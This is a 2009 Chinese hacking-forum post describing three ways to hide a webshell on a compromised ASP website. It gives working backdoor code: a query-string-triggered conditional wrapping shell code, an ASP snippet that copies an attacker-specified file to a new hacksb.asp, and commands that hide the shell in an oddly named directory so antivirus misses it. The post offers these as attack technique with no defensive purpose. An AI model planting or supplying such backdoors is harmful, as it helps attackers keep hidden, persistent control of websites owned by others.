找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 591|回复: 0

三种隐藏Webshell的方法

[复制链接]

482

主题

303

回帖

1486

牛毛

二级牛人

学习  !!!

积分
1486
QQ
发表于 2009-8-23 11:38:26 | 显示全部楼层 |阅读模式 来自 河北省沧州市
第一种:  
在我们要做手脚的asp文件里加入如下内容  
<%if request("action")="ok" then%>  
shell代码插在这里  
<%end if%>  
访问的时候在你作手脚的asp文件后面加上?action=ok,即可  

第二种:  
在我们要做手脚的asp文件里加入如下内容  
<%  
on error resume next  
strFileName = Request.QueryString("filer")  
set objStream = Server.createObject("ABODB.Stream")  
objStream.Type = 1  
objStream.Open  
objStream.LoadFromFile strFileName  
objStream.SaveToFile Server.mappath("hacksb.asp"),2  
%>  
访问的时候在做手脚的asp文件后面加上?filer=xxx,  
xxx为你本地上传的一个路径如C:\hacksb.asp,  
上传后在做手脚的asp的同文件夹中会自动生成hacksb.asp  

第三种:  
前提得到system权限,  
进入网站目录下一层  
mkdir s…  
copy hacksb.asp s…/  
这样杀毒软件找不到的  
访问http://网站/s…/hacksb.asp即可
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-4-28 15:44 , Processed in 0.172832 second(s), 31 queries .

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表